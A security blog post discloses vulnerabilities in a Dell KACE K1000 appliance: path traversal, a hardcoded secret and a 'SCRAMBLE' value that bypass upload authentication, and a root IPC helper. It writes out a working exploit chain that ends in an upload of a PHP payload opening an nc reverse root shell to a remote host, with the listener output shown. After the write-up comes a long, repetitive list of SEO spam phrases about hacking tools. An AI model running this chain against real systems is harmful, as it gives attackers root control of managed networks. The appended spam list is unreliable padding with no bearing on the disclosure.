The Curious Case Of The Ninjamonkeypiratelaser Backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:

POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini   ;
;;;;;;;;;;;;;;;;;;;

That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:

http://targethost/service/kbot_upload.php

This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);
            return;
        }

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:

    private static function calcTokenChecksum($filename, $machineId, $mac)
    {
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
     
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
                   'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
    }

The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksum" check, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  

 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {

Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").

The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:

    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    <?php
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 

Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:

    http://targethost/service/tmp/db.php

On our host:

    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( http://nmap.org/ncat )
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:

Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1

That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:

More information

1. Hak5 Tools
2. Hacking App
3. Hacking Tools For Games
4. Hack Tools Pc
5. Hacking Tools Usb
6. Hack App
7. Best Hacking Tools 2019
8. Hacker Tools
9. Hack Tools For Mac
10. Best Hacking Tools 2019
11. Pentest Automation Tools
12. Hacker Tools Software
13. Hacking Tools For Kali Linux
14. Hacker Tools List
15. Pentest Tools Nmap
16. Hacking Tools 2019
17. Hacker Tools For Mac
18. Tools For Hacker
19. Pentest Tools Nmap
20. Hacking Tools Software
21. Hacker Tools Online
22. Hacking Tools 2020
23. Hack Tool Apk
24. Pentest Tools Apk
25. Pentest Tools
26. Wifi Hacker Tools For Windows
27. Hacking Tools For Mac
28. Kik Hack Tools
29. Blackhat Hacker Tools
30. Pentest Tools Url Fuzzer
31. Hacker Security Tools
32. What Is Hacking Tools
33. Hacker Search Tools
34. Hacks And Tools
35. Hacking Tools Kit
36. Hack Website Online Tool
37. Free Pentest Tools For Windows
38. Hacking Tools Name
39. Nsa Hack Tools Download
40. Hack Tools For Games
41. What Are Hacking Tools
42. Hacking Tools Free Download
43. Hack App
44. New Hack Tools
45. Tools Used For Hacking
46. Pentest Box Tools Download
47. Pentest Tools For Windows
48. New Hack Tools
49. Computer Hacker
50. Bluetooth Hacking Tools Kali
51. Best Hacking Tools 2020
52. Pentest Tools Bluekeep
53. Hacking Tools Pc
54. Hacking Tools For Pc
55. Pentest Tools
56. Tools 4 Hack
57. Pentest Reporting Tools
58. Nsa Hack Tools Download
59. Pentest Tools Linux
60. Pentest Automation Tools
61. Hackers Toolbox
62. Hacker Tools Apk
63. Hacking Tools And Software
64. Underground Hacker Sites
65. Hacker
66. Nsa Hack Tools Download
67. Hack Tools For Ubuntu
68. Hacking Tools For Windows 7
69. Hacking Tools For Windows Free Download
70. Best Pentesting Tools 2018
71. Termux Hacking Tools 2019
72. Pentest Tools Android
73. Pentest Tools Free
74. Pentest Box Tools Download
75. Hacking Tools For Mac
76. Hacking Tools Online
77. Hacker Tools 2020
78. Hacker Tools For Ios
79. Tools Used For Hacking
80. Android Hack Tools Github
81. Hacking Tools Usb
82. Pentest Tools Linux
83. Best Hacking Tools 2020
84. Hacking Tools For Windows 7
85. What Is Hacking Tools
86. Hack Tool Apk
87. Hackrf Tools
88. Hacker Hardware Tools
89. Hacker Tools Free
90. Hacking Tools For Windows
91. Hacker Tools Hardware
92. Pentest Tools Open Source
93. How To Install Pentest Tools In Ubuntu
94. Hack Tools
95. Hacking App
96. Game Hacking
97. Hacking Tools For Mac
98. Hacker Tools Free Download
99. Hacker Tools Linux
100. Hacker Tools For Windows
101. What Is Hacking Tools
102. Nsa Hack Tools Download
103. Hack Tools
104. Pentest Tools Website
105. Pentest Tools Review
106. Hacking Tools Online
107. Hacker Tools Linux
108. Hacker Tools Software
109. Github Hacking Tools
110. Hacker Search Tools
111. Hacking Tools And Software
112. Install Pentest Tools Ubuntu
113. Nsa Hack Tools
114. Hack Tools 2019
115. Hacker Tools Apk Download
116. Easy Hack Tools
117. Hack Tools For Ubuntu
118. Hack Tools For Ubuntu
119. Hacker Tools 2020
120. Hack Tools Download
121. Pentest Tools Download
122. Hacking Tools For Beginners
123. Hack Tools
124. Beginner Hacker Tools
125. Best Hacking Tools 2020
126. Pentest Tools Kali Linux
127. Pentest Tools For Ubuntu
128. Hacker Tools Online
129. Hacker Tools Apk
130. Pentest Automation Tools
131. Beginner Hacker Tools
132. Pentest Tools Free
133. Hacking Tools Pc
134. Hacking Tools For Windows Free Download
135. Hacking Tools For Windows Free Download
136. Pentest Tools Nmap
137. Hacking Tools 2020
138. Hacking Tools Github
139. Computer Hacker
140. Pentest Box Tools Download
141. Nsa Hack Tools